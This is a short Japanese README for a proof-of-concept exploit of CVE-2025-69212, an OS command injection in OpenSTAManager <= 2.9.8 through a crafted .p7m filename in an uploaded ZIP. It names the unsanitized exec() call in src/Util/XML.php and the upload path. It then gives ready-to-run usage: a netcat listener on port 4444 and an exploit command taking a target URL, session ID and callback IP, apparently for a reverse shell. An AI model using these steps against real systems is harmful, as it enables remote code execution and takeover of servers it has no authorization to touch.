
CVE-2025-69212の概念実証エクスプロイト:OpenSTAManager <= 2.9.8における、ZIPアップロード時の悪意のある.p7mファイル名を介したOSコマンドインジェクションにより、リモートコード実行が可能になります。
OpenSTAManager <= 2.9.8 — ZIPアップロードにおける悪意のある.p7mファイル名を介したOSコマンドインジェクション
ファイル: src/Util/XML.php:100 — 未サニタイズの$fileがexec()内に
ベクター: /plugins/importFE_ZIP/actions.php → ZIP → .p7mファイル名 → exec("openssl smime ... -in \"$file\" ...")
# Listener
nc -lvnp 4444
# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444